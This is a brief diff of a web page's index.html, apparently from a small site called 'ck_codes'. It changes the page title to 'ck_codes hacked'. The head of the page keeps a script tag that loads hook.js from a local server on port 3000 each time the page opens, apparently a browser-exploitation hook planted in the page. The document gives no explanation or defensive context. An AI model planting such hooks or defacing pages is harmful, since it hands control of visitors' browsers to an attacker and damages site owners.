--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <script src="http://127.0.0.1:3000/hook.js"></script>
-    <title>ck_codes</title>
+    <title>ck_codes hacked</title>
 </head>
 <body>
     <h1>Welcome to ck_codes</h1><br>
